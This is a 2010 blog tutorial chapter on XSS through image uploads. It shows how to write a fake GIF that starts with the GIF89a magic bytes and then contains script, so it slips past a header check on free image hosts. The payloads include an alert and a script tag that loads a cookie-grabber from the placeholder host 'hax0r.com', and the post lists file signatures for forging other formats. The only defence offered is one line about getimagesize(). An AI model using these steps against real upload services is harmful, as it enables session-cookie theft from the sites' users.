Tuesday, November 23, 2010

Home / Xss Complete Tutorial / =======Chapter 8 - XSS upload==========

=======Chapter 8 - XSS upload==========

on in
Make Haxored.gif in paint for exemple
after open Haxored.GIF in notepad
delete all line and insert this:
GIF89a<script>alert("XSS")</script>

save and close it
upload Haxored.gif in a free image hoster look your image
and XSS is here...
dont take Mozillia Firefox for look your image but Mozillia dont run your alert
use Internet explorer

Why add GIF89a ?
well some upload like this one, check that the 'GIF89a' code
is contained in the image as in any .GIF respective.
the vulnerability of this upload results from the checking 'GIF89a' code
for confirmation but of nothing the possible malicious codes contained in this image.
GIF89a<script src="http://hax0r.com/cookiegrabber.php"></script>

to know the code for another image format,
it is just enough to open an image jpg or other with a text editor,
for example a png file: ‰PNG

PNG = ‰PNG
GIF = GIF89a
JPG = ÿØÿà JFIF
BMP = BMFÖ


For secure it dont check getimagesize() only
Author Image

About SUMIT OJHA
Soratemplates is a blogger resources site is a provider of high quality blogger template with premium looking layout and robust design. The main mission of templatesyard is to provide the best quality blogger templates.

You May Also Like:
at
Labels:

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)